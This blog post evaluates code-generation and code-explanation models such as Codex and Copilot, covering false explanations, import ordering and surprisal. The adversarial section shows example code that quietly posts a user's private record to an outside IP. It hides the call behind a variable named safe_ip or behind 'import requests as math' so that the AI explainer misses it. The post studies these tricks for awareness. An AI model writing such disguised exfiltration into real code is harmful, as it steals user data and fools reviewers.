Evaluating code-generation models from an NLU perspective

Nick Doiron
Feb 19, 2022 · 7 min read


In December 2021, there was a surge of activity around OpenAI Codex (powering GitHub Copilot and Replit), HuggingFace’s CodeParrot model, and code prompting with EleutherAI’s GPT-J. The models continue to improve and gain adoption.

And there continues to be research evaluating GPT-J (as it’s one of the few public models).

Code explanations

Though code completion and syntax correction have been programming staples for years, this generation of models generates functions and web content from prompts. OpenAI’s Codex also introduced code-explaining models, which appear to translate code into human-friendly terms. It’s unclear what data was used for training.
I opened a C# file in the OpenRA game codebase and asked it to explain this function:

/* 1. If the animation is completed, then it removes itself from the world. */

Note that the word ‘animation’ doesn’t appear anywhere in this snippet, or its file, or in related git commits. After some investigation, I found this code is called when ending videos. So Codex creates a plausible-sounding and sort-of-right explanation, but it’s important to remember it does not do this by reading or processing the actual codebase.

Limitations of language models

The NLP community’s experience with Large Language Models (LLMs) includes studying the misconception that models which read text also understand it, and that models which write also have intent in a human sense.
In my earliest projects with LSTMs, the models easily learned grammar rules and could correct spelling errors in the Esperanto Wikipedia, but their free-form generative output was nonsense.

The question of whether models actually understand what they read has led to the term Natural Language Understanding (NLU). There’s deeper exploration of this in Bender and Koller’s Climbing towards NLU: On Meaning, Form, and Understanding in the Age of Data and in the famous Stochastic Parrots paper.

Keras creator François Chollet also frequently describes deep learning models as “locality-sensitive hashtables” and proposed a reasoning task (ARC) which could not simply be overcome with a mountain of training data.

Code models follow in the footsteps of GPT-2 and GPT-3. Though you can find many criticisms of GPT being prompted into racism and other stereotypes, generative models are also particularly vulnerable to false premises. Suppose I give a model the sentence “I am carrying 100 elephants in __”. This type of model cannot backtrack. It knows that people carry things in only a few likely places (pocket, bag, luggage, car). Steering this sentence back to reality (“but these are toy elephants”) would require a multi-token journey through language that is very uncommon within one sample of text, so most models accept the premise and move on.

GPT-3 Curie does sometimes complete the sentence and then challenge the premise (“you got me there”), or goes the metaphorical route.

Why do these examples matter? We’re trying to understand who we’re working with when we pair-program with today’s models. Are they an upgraded syntax checker, a plagiarist, a 10x programmer…?

Generative models in coding

One of the reasons that I frame this story around generative language models and the ‘elephants’ example is that reviewing code is a difficult problem and is not solely sequential / prompt-based.
Generative models append code, but cannot move backward in a file (for example, to add an import). When I start a function with def area_of_circle(radius): the suggested body hard-codes 3.14, unless I have already imported the math library:
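Roughly, the two situations look like this (the completions are paraphrased from what I saw, not exact Copilot output):

# in a file with no imports, the typical suggestion hard-codes pi
def area_of_circle(radius):
    return 3.14 * radius ** 2

# in a file that already starts with `import math`, the suggestion uses the library
import math

def area_of_circle(radius):
    return math.pi * radius ** 2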

I would argue that a strictly first-to-last-line model would never be good at this because it has little to no context in the beginning, and would be unlikely to import math inside of a function.
Later on in a file, a model’s internal probabilities can be used to measure surprisal. This could be a helpful indicator that my code should be rewritten, or that the code does not match my initial comments. So far, none of these systems have a UI that works those internal probabilities into suggestions, or (critically) flags potentially dangerous code. More on that later.
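As a rough sketch of what that could look like: token-level surprisal can be read directly out of a public causal model such as CodeParrot. This assumes the codeparrot/codeparrot-small checkpoint and the HuggingFace transformers API, and it is an illustration rather than any product’s actual scoring code.

import math
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

# Assumes the public codeparrot/codeparrot-small checkpoint; any causal LM works the same way.
tokenizer = AutoTokenizer.from_pretrained("codeparrot/codeparrot-small")
model = AutoModelForCausalLM.from_pretrained("codeparrot/codeparrot-small")
model.eval()

def token_surprisal(code):
    """Return (token, surprisal in bits) for each token, predicted from its left context."""
    ids = tokenizer(code, return_tensors="pt").input_ids
    with torch.no_grad():
        logits = model(ids).logits
    # Token i+1 is predicted from tokens 0..i, so shift the logits against the labels.
    log_probs = torch.log_softmax(logits[0, :-1], dim=-1)
    targets = ids[0, 1:]
    nll = -log_probs[torch.arange(targets.shape[0]), targets]
    bits = (nll / math.log(2)).tolist()
    return list(zip(tokenizer.convert_ids_to_tokens(targets.tolist()), bits))

# Tokens with unusually high surprisal could be flagged for a human to review.
for token, bits in token_surprisal("import requests as math\n"):
    print(f"{bits:6.2f}  {token}")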

In addition to the StackOverflow bad-then-good generation mentioned at the start of this post, models may suggest poor-quality code to match your style:

blog.andrewcantino.com/blog/2021/04/21/prompt-engineering-tips-and-tricks/

So today’s prompt models are nothing like working with someone who understands the intent of your work.

Facebook’s new CM3 generative model (trained on web page text, images, and HTML) takes an alternative approach: one sub-section is <mask>-ed out, and the model is asked to generate it only after it has seen the rest of the document.
This looks promising, but cannot resolve import issues (from later code, it will be evident which imports I am using, not which I should have used).
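Schematically, the infilling setup looks something like this (format simplified; these are not CM3’s actual sentinel tokens):

# the span to fill is masked out of the original document...
original_doc = "import math\ndef area(r):\n    <mask>\n"
# ...and moved to the end, so the model generates it after reading the rest of the file
training_doc = "import math\ndef area(r):\n    <mask>\n<infill> return math.pi * r ** 2"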

Fun with Adversarial Examples

Code-explaining models are trained on ordinary code and explanations, so they trust imports, comments, and variable names. That means bad actors can con them into glossing over malicious code.

Note that the explanation changes from time to time when you click “Ask Copilot”. Codex (as used in Copilot and Replit) is likely a fine-tuned GPT model that samples among the top-n probable tokens at each step, and then among the top tokens that follow. That variability is handy for testing this feature, but it also gives the illusion that the model parses, interprets, or runs the code before explaining it.
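A minimal sketch of that kind of decoding step (my guess at the mechanism, not Codex’s actual decoder):

import torch

def sample_top_k(logits, k=5, temperature=0.8):
    """Keep the k most probable next tokens, renormalize, and draw one at random."""
    top = torch.topk(logits / temperature, k)
    probs = torch.softmax(top.values, dim=-1)
    choice = torch.multinomial(probs, num_samples=1)
    return top.indices[choice].item()

Running this twice on the same logits can return different tokens, which is why the same snippet gets different explanations on different clicks.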

I had fun quickly putting together a code example where the feature almost always ignores that I’m exporting private data in the background:
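The original screenshot isn’t reproduced here, but the snippet was in this spirit (the names and URL are invented for illustration, not the exact code):

import requests

def check_connection(user_record):
    # the comment and names claim a harmless connectivity check...
    safe_ip = "203.0.113.7"  # "safe" in name only
    # ...but this line quietly posts the user's private data to an outside server
    requests.post("http://" + safe_ip + "/collect", json=user_record)
    return True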

The model likely has not seen code like this before and has no reference for how to react. In some cases I’ve seen it decide that a variable named safe_ip is… safe. A compiled code parser would not fall for this.
Again this is an example where the internal surprisal of the code-reading model, if visible to the user, could likely warn that something was amiss.

Is Adversarial Code a true vulnerability?

My initial goal is to spread awareness, create policies, and improve code models’ responses and use-cases.

I thought of three arguments against considering this topic seriously:

  • Humans running random code is the real threat. If an engineer is getting code directly from the web, you already have a problem.
    Copying code from StackOverflow is a running joke in the programming world, but it happens.
    Copilot’s novelty makes it difficult to say how engineers will treat it; if your office has no policy about running code-generation or code-explanation tools, you should assume that someone is trying them. Most public discourse so far has focused on copyright, so I think most users don’t consider security, and their trust will only increase with higher-quality future versions of the product.
  • The example that you created is obviously wrong. How would you not notice? Adversarial examples are created for multiple reasons. Some are algorithmically tuned to defeat a model, some challenge understanding or generalization (a good model should pass the given test), and others are a proof of concept (if the model fails on known example X, then we anticipate it will fail in other future conditions Y).
    I think it’s good to show a conspicuous example on Twitter to discuss how an AI ought to respond to this problem. If you have a tricky example or a huge demo just add an issue or PR.
  • There are too many workarounds. For example, if import requests as math is a red flag, the attacker can include their own math.py so that the code reads import math, or use a totally new name like algorithm_king (see the sketch after this list). This one will be challenging as long as Codex only looks at one snippet or file, and as long as importing and pip install-ing dependencies involves a great deal of trust in every language. Where I place this slice of research is on confounding the AI with obfuscated code, versus problems which could be caught with a linter / filename checker / other simple bash script.
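The sketch below shows the aliasing trick: the import makes an exfiltration call read like arithmetic to anyone (or any model) skimming a single snippet. Again, the names and URL are invented for illustration.

import requests as math  # the alias hides a network library behind a trusted name

def circle_area(radius):
    math.post("http://203.0.113.7/log", json={"radius": radius})  # reads like a math call
    return 3.14159 * radius ** 2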

Future work

I initially wrote this post to explain my idea to use one of the few public code generation models and datasets (CodeParrot) to measure surprisal on code examples. I’m particularly interested in missing imports, adversarial imports and variable names, and errors where the intent is given in a comment.

I suspect that sequential/generative models will need the code reordered to capture surprisal in one place, such as a long function followed by a single-line comment ‘explaining’ what I expected that code to do.
It makes me wonder: will we someday design our programming conventions and comments to encourage the models to check us?

# libraries to calculate surface area of a sphere: _
def surface_area(radius):
    a = 4 * 3.14 * radius**2
    return radius * 2
# did this return the correct surface area of a sphere: _

Update Feb 24: I recently got access to the Codex API to run some of these examples with more flexibility, and expand the dangerous attack checks into SQL generation and explanation.
